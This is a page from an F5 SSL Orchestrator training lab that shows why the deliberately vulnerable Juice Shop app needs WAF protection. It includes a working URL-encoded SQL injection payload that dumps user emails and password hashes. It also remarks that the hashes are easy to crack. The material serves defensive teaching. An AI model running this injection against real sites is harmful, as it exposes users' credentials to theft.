F5 BIG-IP SSL Orchestrator Training Lab > All SSL Orchestrator Lab Guides > SSLO 201: Advanced Use Cases with SSL Orchestrator (Agility 2022 | 2 hours) > 4. Web Application Firewall-as-a-Service (WAFaaS) Source | Edit on
4.3. The Juiceshop ApplicationΒΆ
We will start by establishing an RDP session to the Ubuntu 18.04 Client.
Start an RDP session to the Ubuntu 18.04 CLient (Components > Ubuntu18.04 Client > ACCESS > XRDP)
When prompted, save the RDP file to your local machine and then open it to connect.
At the Ubuntu Login prompt, click on the OK button to continue.
Tip
If the RDP session times out, refer to the User Credentials for the student user password.
Open the Firefox browser
Click on the Juiceshop bookmark on the browser bar
Accept the security risk by clicking Advanced and Accept the Risk and Continue. This is due to the BIGIP using a self-signed certificate.
Here is the vulnerable Juiceshop application. Next, we will try a simple SQL injection attack that will illustrate why WAF protection is necessary.
- Copy and Paste the following path in your browser's location bar after https://10.1.20.200/
/rest/products/search?q=qwert%27%29%29%20UNION%20SELECT%20id%2C%20email%2C%20password%2C%20%274%27%2C%20%275%27%2C%20%276%27%2C%20%277%27%2C%20%278%27%2C%20%279%27%20FROM%20Users--
- The browser's location bar should look like this:
https://10.1.20.200/rest/products/search?q=qwert%27%29%29%20UNION%20SELECT%20id%2C%20email%2C%20password%2C%20%274%27%2C%20%275%27%2C%20%276%27%2C%20%277%27%2C%20%278%27%2C%20%279%27%20FROM%20Users--
This will cause the application to dump a list of users in the database to include their hashed passwords. YIKES!
Warning
An attacker could easily grab the hashed passwords and decrypt in a free password hash cracker widely available on the internet. We will take steps to protect this insecure application using SSL Orchestrator and WAFaaS.